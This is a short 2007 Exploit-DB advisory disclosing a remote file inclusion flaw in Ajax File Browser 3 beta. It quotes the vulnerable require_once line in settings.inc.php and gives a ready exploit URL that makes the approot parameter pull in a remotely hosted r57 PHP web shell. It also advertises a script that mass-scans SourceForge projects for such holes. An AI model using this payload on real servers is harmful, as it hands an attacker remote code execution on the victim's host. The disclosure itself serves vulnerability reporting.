Ajax File Browser 3b - 'settings.inc.php?approot' Remote File Inclusion

EDB-ID:

4405


Platform:

PHP

Published:

2007-09-14

Ajax File Browser 3 Beta Remote File Inclusion
##############################################

                                                found by the "arfis project"
                                                http://arfis.wordpress.com/

Project Info:
-------------
	Name: Ajax File Browser
	Link: http://sourceforge.net/projects/ajaxfb/
	DL:   http://surfnet.dl.sourceforge.net/sourceforge/ajaxfb/afb-3-beta-2007-08-28.zip


Vulnerability Info:
-------------------
	File: _includes/settings.inc.php
	Line: 12
	Code: require_once($approot. _includes/functions_file.inc.php );


Exploit Example:
----------------
	http://localhost/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://localhost/r57.txt?


About arfis:
------------
	"arfis" stands for "automated Remote File Inclusion search". It's a perl script
	that automatically download and extract PHP projects from sourceforge.net. It then
	checks the project for RFI vulnerabilities, if found one it post's it to the arfis-
	blog, or database if you want to call it like that. Feel free to come around and
	find your own RFI:
	                   http://arfis.wordpress.com/

# milw0rm.com [2007-09-14]